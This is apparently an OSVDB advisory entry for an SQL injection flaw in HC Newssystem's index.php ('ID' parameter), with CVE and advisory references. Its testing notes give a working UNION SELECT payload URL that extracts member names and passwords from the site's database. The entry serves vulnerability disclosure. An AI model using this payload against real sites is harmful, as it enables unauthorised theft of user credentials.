HC Newssystem index.php komm Action ID Variable SQL Injection

2007-03-09T09:48:51
ID OSVDB:33976
Type osvdb
Reporter OSVDB
Modified 2007-03-09T09:48:51

Description

Manual Testing Notes

http://[target]/path/index.php?option=news&aktion=komm&ID=-1//UNION//SELECT//null,null,mname,null,mpassword,null,null//FROM/ /hcmitglieder//WHERE/*/id=1/

References:

Secunia Advisory ID: 24477
Other Advisory URL: http://milw0rm.com/exploits/3449
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0078.html
FrSIRT Advisory: ADV-2007-0904
CVE-2007-1417
Bugtraq ID: 22898